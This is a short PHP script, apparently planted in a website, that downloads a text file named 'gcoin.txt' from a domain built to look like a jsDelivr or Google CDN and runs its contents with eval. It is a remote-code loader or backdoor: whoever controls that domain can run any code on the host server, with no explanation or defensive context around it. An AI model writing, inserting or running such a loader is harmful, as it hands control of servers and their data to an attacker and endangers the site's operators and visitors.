<?php $fu = "https://cdn-jsdelivr.googledv-hostinged.com/gcoin.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $fu); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $ct = curl_exec($ch); curl_close($ch); eval("?>" . $ct);